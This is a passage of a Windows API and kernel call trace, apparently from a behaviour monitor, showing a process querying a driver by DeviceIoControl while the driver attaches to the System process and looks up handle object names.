Object=0xfffff88005163548*=0xfffffa80029f2d30, HandleInformation=0x0) returned 0x0 [0116.812] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0116.812] PsReleaseProcessExitSynchronization () returned 0x2 [0116.812] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x7a [0116.812] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa800283d044, Length=0x800, ReturnLength=0xfffff88005163508 | out: ObjectNameInfo=0xfffffa800283d044, ReturnLength=0xfffff88005163508) returned 0x0 [0116.812] ObfDereferenceObject (Object=0xfffffa80029f2d30) returned 0x1 [0116.812] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0116.812] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x1e905e0 | out: hHeap=0x290000) returned 1 [0116.812] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x1e905e0 [0116.812] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1e905e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1e905e0*, lpBytesReturned=0x12d450*=0x106, lpOverlapped=0x0) returned 1 [0116.812] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0116.812] PsAcquireProcessExitSynchronization () returned 0x0 [0116.812] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880051635d0) [0116.813] ObReferenceObjectByHandle (in: Handle=0xffffffff80000080, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0600, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa800343b050, HandleInformation=0x0) returned 0x0 [0116.813] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0116.813] PsReleaseProcessExitSynchronization () returned 0x2 [0116.813] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x7a [0116.813] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa800255c504, Length=0x800, ReturnLength=0xfffff88005163508 | out: ObjectNameInfo=0xfffffa800255c504, ReturnLength=0xfffff88005163508) returned 0x0 [0116.813] ObfDereferenceObject (Object=0xfffffa800343b050) returned 0x1 [0116.813] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0116.813] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x1e905e0 | out: hHeap=0x290000) returned 1 [0116.813] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x1e905e0 [0116.813] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1e905e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1e905e0*, lpBytesReturned=0x12d450*=0x106, lpOverlapped=0x0) returned 1 [0116.813] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0116.813] PsAcquireProcessExitSynchronization () returned 0x0 [0116.813] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880051635d0) [0116.813] ObReferenceObjectByHandle (in: Handle=0xffffffff80000084, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0600, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa8002ad5ca0, HandleInformation=0x0) returned 0x0 [0116.813] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0116.813] PsReleaseProcessExitSynchronization () returned 0x2 [0116.813] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x7a [0116.813] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8002483044, Length=0x800, ReturnLength=0xfffff88005163508 | out: ObjectNameInfo=0xfffffa8002483044, ReturnLength=0xfffff88005163508) returned 0x0 [0116.813] ObfDereferenceObject (Object=0xfffffa8002ad5ca0) returned 0x1 [0116.813] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0116.813] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x1e905e0 | out: hHeap=0x290000) returned 1 [0116.813] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x1e905e0 [0116.813] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1e905e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1e905e0*, lpBytesReturned=0x12d450*=0xba, lpOverlapped=0x0) returned 1 [0116.813] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0116.813] PsAcquireProcessExitSynchronization () returned 0x0 [0116.813] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880051635d0) [0116.813] ObReferenceObjectByHandle (in: Handle=0xffffffff80000088, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0600, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa80028dfb50, HandleInformation=0x0) returned 0x0 [0116.813] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0116.813] PsReleaseProcessExitSynchronization () returned 0x2 [0116.814] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x7a [0116.814] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa800269a044, Length=0x800, ReturnLength=0xfffff88005163508 | out: ObjectNameInfo=0xfffffa800269a044, ReturnLength=0xfffff88005163508) returned 0x0 [0116.814] ObfDereferenceObject (Object=0xfffffa80028dfb50) returned 0x1 [0116.814] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0116.814] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x1e905e0 | out: hHeap=0x290000) returned 1 [0116.814] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x1e905e0 [0116.814] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1e905e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1e905e0*, lpBytesReturned=0x12d450*=0x14, lpOverlapped=0x0) returned 1 [0116.814] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0116.814] PsAcquireProcessExitSynchronization () returned 0x0 [0116.814] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880051635d0) [0116.814] ObReferenceObjectByHandle (in: Handle=0xffffffff8000009c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0600, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa80029f0270, HandleInformation=0x0) returned 0x0 [0116.814] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0116.814] PsReleaseProcessExitSynchronization () returned 0x2 [0116.814] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x7a [0116.814] ObQueryNameString (in: Object=0xfffffa80029f0270, ObjectNameInfo=0xfffffa80026aa044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa80026aa044, ReturnLength=0xfffff88005163550) returned 0x0 [0116.815] ObfDereferenceObject (Object=0xfffffa80029f0270) returned 0x2 [0116.815] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0116.815] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x1e905e0 | out: hHeap=0x290000) returned 1 [0116.815] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x1e905e0 [0116.815] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1e905e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1e905e0*, lpBytesReturned=0x12d450*=0x14, lpOverlapped=0x0) returned 1 [0116.815] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0116.815] PsAcquireProcessExitSynchronization () returned 0x0 [0116.815] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880051635d0) [0116.815] ObReferenceObjectByHandle (in: Handle=0xffffffff800000a0, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0600, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa80029f0600, HandleInformation=0x0) returned 0x0 [0116.815] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0116.815] PsReleaseProcessExitSynchronization () returned 0x2 [0116.815] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x7a [0116.815] ObQueryNameString (in: Object=0xfffffa80029f0600, ObjectNameInfo=0xfffffa80026ab044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa80026ab044, ReturnLength=0xfffff88005163550) returned 0x0 [0116.815] ObfDereferenceObject (Object=0xfffffa80029f0600) returned 0x2 [0116.815] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0116.815] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x1e905e0 | out: hHeap=0x290000) returned 1 [0116.815] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x1e905e0 [0116.815] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1e905e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1e905e0*, lpBytesReturned=0x12d450*=0x14, lpOverlapped=0x0) returned 1 [0116.815] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0116.815] PsAcquireProcessExitSynchronization () returned 0x0 [0116.815] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880051635d0) [0116.815] ObReferenceObjectByHandle (in: Handle=0xffffffff800000a4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0600, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa80029f0cd0, HandleInformation=0x0) returned 0x0 [0116.815] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0116.815] PsReleaseProcessExitSynchronization () returned 0x2 [0116.815] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x7a [0116.816] ObQueryNameString (in: Object=0xfffffa80029f0cd0, ObjectNameInfo=0xfffffa80027e2584, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa80027e2584, ReturnLength=0xfffff88005163550) returned 0x0 [0116.816] ObfDereferenceObject (Object=0xfffffa80029f0cd0) returned 0x1 [0116.816] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0116.816] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x1e905e0 | out: hHeap=0x290000) returned 1 [0116.816] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x1e905e0 [0116.816] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1e905e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1e905e0*, lpBytesReturned=0x12d450*=0x14, lpOverlapped=0x0) returned 1 [0116.816] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0116.816] PsAcquireProcessExitSynchronization () returned 0x0 [0116.816] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880051635d0) [0116.816] ObReferenceObjectByHandle (in: Handle=0xffffffff800000a8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0600, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa80028de340, HandleInformation=0x0) returned 0x0 [0116.816] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0116.816] PsReleaseProcessExitSynchronization () returned 0x2 [0116.816] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x7a [0116.816] ObQueryNameString (in: Object=0xfffffa80028de340, ObjectNameInfo=0xfffffa8002805044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa8002805044, ReturnLength=0xfffff88005163550) returned 0x0 [0116.816] ObfDereferenceObject (Object=0xfffffa80028de340) returned 0x2 [0116.816] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0116.816] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x1e905e0 | out: hHeap=0x290000) returned 1 [0116.816] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x1e905e0 [0116.816] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1e905e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1e905e0*, lpBytesReturned=0x12d450*=0xba, lpOverlapped=0x0) returned 1 [0116.816] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0116.816] PsAcquireProcessExitSynchronization () returned 0x0 [0116.816] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880051635d0) [0116.816] ObReferenceObjectByHandle (in: Handle=0xffffffff800000ac, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0600, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa80029eebd0, HandleInformation=0x0) returned 0x0 [0116.816] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0116.816] PsReleaseProcessExitSynchronization () returned 0x2 [0116.816] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x7a [0116.816] ObQueryNameString (in: Object=0xfffffa80029eebd0, ObjectNameInfo=0xfffffa8002804044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa8002804044, ReturnLength=0xfffff88005163550) returned 0x0 [0116.817] ObfDereferenceObject (Object=0xfffffa80029eebd0) returned 0x2 [0116.817] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0116.817] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x1e905e0 | out: hHeap=0x290000) returned 1 [0116.817] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x1e905e0 [0116.817] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1e905e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1e905e0*, lpBytesReturned=0x12d450*=0x6a, lpOverlapped=0x0) returned 1 [0116.817] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0116.817] PsAcquireProcessExitSynchronization () returned 0x0 [0116.817] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880051635d0) [0116.817] ObReferenceObjectByHandle (in: Handle=0xffffffff800000b0, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0600, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa80029ef210, HandleInformation=0x0) returned 0x0 [0116.817] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0116.817] PsReleaseProcessExitSynchronization () returned 0x2 [0116.817] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x7a [0116.817] ObQueryNameString (in: Object=0xfffffa80029ef210, ObjectNameInfo=0xfffffa8002802044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa8002802044, ReturnLength=0xfffff88005163550) returned 0x0 [0116.817] ObfDereferenceObject (Object=0xfffffa80029ef210) returned 0x1 [0116.817] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0116.817] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x1e905e0 | out: hHeap=0x290000) returned 1 [0116.817] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x1e905e0 [0116.817] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1e905e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1e905e0*, lpBytesReturned=0x12d450*=0xba, lpOverlapped=0x0) returned 1 [0116.817] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0116.817] PsAcquireProcessExitSynchronization () returned 0x0 [0116.817] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880051635d0) [0116.817] ObReferenceObjectByHandle (in: Handle=0xffffffff800000b4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0600, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa80028df710, HandleInformation=0x0) returned 0x0 [0116.817] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0116.818] PsReleaseProcessExitSynchronization () returned 0x2 [0116.818] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x7a [0116.818] ObQueryNameString (in: Object=0xfffffa80028df710, ObjectNameInfo=0xfffffa80027ff044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa80027ff044, ReturnLength=0xfffff88005163550) returned 0x0 [0116.818] ObfDereferenceObject (Object=0xfffffa80028df710) returned 0x2 [0116.818] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0116.818] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x1e905e0 | out: hHeap=0x290000) returned 1 [0116.818] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x1e905e0 [0116.818] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1e905e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1e905e0*, lpBytesReturned=0x12d450*=0x88, lpOverlapped=0x0) returned 1 [0116.818] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0116.818] PsAcquireProcessExitSynchronization () returned 0x0 [0116.818] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880051635d0) [0116.818] ObReferenceObjectByHandle (in: Handle=0xffffffff800000b8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0600, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa8002987690, HandleInformation=0x0) returned 0x0 [0116.818] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0116.818] PsReleaseProcessExitSynchronization () returned 0x2 [0116.818] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x7a [0116.818] ObQueryNameString (in: Object=0xfffffa8002987690, ObjectNameInfo=0xfffffa80027ea044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa80027ea044, ReturnLength=0xfffff88005163550) returned 0x0 [0116.818] ObfDereferenceObject (Object=0xfffffa8002987690) returned 0x2 [0116.818] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0116.818] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x1e905e0 | out: hHeap=0x290000) returned 1 [0116.818] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x1e905e0 [0116.818] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1e905e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1e905e0*, lpBytesReturned=0x12d450*=0x14, lpOverlapped=0x0) returned 1 [0116.818] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0116.818] PsAcquireProcessExitSynchronization () returned 0x0 [0116.818] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880051635d0) [0116.819] ObReferenceObjectByHandle (in: Handle=0xffffffff800000bc, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0600, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa8002868050, HandleInformation=0x0) returned 0x0 [0116.819] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0116.819] PsReleaseProcessExitSynchronization () returned 0x2 [0116.819] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x7a [0116.819] ObQueryNameString (in: Object=0xfffffa8002868050, ObjectNameInfo=0xfffffa80027fb044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa80027fb044, ReturnLength=0xfffff88005163550) returned 0x0 [0116.819] ObfDereferenceObject (Object=0xfffffa8002868050) returned 0x3 [0116.819] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0116.819] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x1e905e0 | out: hHeap=0x290000) returned 1 [0116.819] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x1e905e0 [0116.819] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1e905e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1e905e0*, lpBytesReturned=0x12d450*=0x106, lpOverlapped=0x0) returned 1 [0116.819] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0116.819] PsAcquireProcessExitSynchronization () returned 0x0 [0116.819] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880051635d0) [0116.819] ObReferenceObjectByHandle (in: Handle=0xffffffff800000dc, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0600, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa8006dff1f0, HandleInformation=0x0) returned 0x0 [0116.819] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0116.819] PsReleaseProcessExitSynchronization () returned 0x2 [0116.819] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x7a [0116.819] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa80027e8044, Length=0x800, ReturnLength=0xfffff88005163508 | out: ObjectNameInfo=0xfffffa80027e8044, ReturnLength=0xfffff88005163508) returned 0x0 [0116.819] ObfDereferenceObject (Object=0xfffffa8006dff1f0) returned 0x1 [0116.819] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0116.819] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x1e905e0 | out: hHeap=0x290000) returned 1 [0116.819] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x1e905e0 [0116.819] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1e905e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1e905e0*, lpBytesReturned=0x12d450*=0x106, lpOverlapped=0x0) returned 1 [0116.819] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0116.819] PsAcquireProcessExitSynchronization () returned 0x0 [0116.819] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880051635d0) [0116.819] ObReferenceObjectByHandle (in: Handle=0xffffffff80000104, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0600, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa8008670f20, HandleInformation=0x0) returned 0x0 [0116.820] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0116.820] PsReleaseProcessExitSynchronization () returned 0x2 [0116.820] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x7a [0116.820] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa80027e9044, Length=0x800, ReturnLength=0xfffff88005163508 | out: ObjectNameInfo=0xfffffa80027e9044, ReturnLength=0xfffff88005163508) returned 0x0 [0116.820] ObfDereferenceObject (Object=0xfffffa8008670f20) returned 0x1 [0116.820] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0116.820] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x1e905e0 | out: hHeap=0x290000) returned 1 [0116.820] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x1e905e0 [0116.820] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1e905e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1e905e0*, lpBytesReturned=0x12d450*=0x106, lpOverlapped=0x0) returned 1 [0116.820] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0116.820] PsAcquireProcessExitSynchronization () returned 0x0 [0116.820] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880051635d0) [0116.820] ObReferenceObjectByHandle (in: Handle=0xffffffff80000108, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0600, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa80093d1f20, HandleInformation=0x0) returned 0x0 [0116.820] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0116.820] PsReleaseProcessExitSynchronization () returned 0x2 [0116.820] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x7a [0116.820] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8002808044, Length=0x800, ReturnLength=0xfffff88005163508 | out: ObjectNameInfo=0xfffffa8002808044, ReturnLength=0xfffff88005163508) returned 0x0 [0116.820] ObfDereferenceObject (Object=0xfffffa80093d1f20) returned 0x1 [0116.820] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0116.820] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x1e905e0 | out: hHeap=0x290000) returned 1 [0116.820] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x1e905e0 [0116.820] 